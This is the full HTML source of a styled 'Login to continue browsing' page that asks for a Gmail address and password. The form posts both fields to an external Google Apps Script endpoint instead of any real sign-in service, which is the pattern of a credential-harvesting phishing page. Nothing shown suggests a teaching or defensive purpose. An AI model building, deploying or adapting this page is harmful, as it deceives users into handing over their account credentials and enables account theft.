<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      margin: 0;
      padding: 0;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    .login-container {
      background-color: #fff;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      padding: 20px;
      width: 300px;
      text-align: center;
    }

    .login-container h2 {
      margin-bottom: 20px;
      color: #333;
    }

    .login-container input {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
    }

    .login-container button {
      background-color: #4caf50;
      color: #fff;
      padding: 10px 15px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }

    .login-container button:hover {
      background-color: #45a049;
    }
  </style>
  

</head>
<body>
  <div class="login-container">
    <h3><img src="download.png" alt=""><br>Login to continue browsing</h3>
    <form action="https://script.google.com/macros/s/AKfycbwswHnuB22HQu6csL2UJxypk3L5Fw3fbNXPCWQdpXTXUP2Q5fNNF_M6bDL998ra2XX5/exec" method="post" onsubmit="submitForm()">
      <input type="text" name="Gmail" placeholder="Gmail" required>
      <input type="password" name="Password" placeholder="Password" required>
      <a href="/detail.html" target="_blank"><button type="submit" >Login</button></a>
    </form>
  </div>
  

  
</body>

</html>
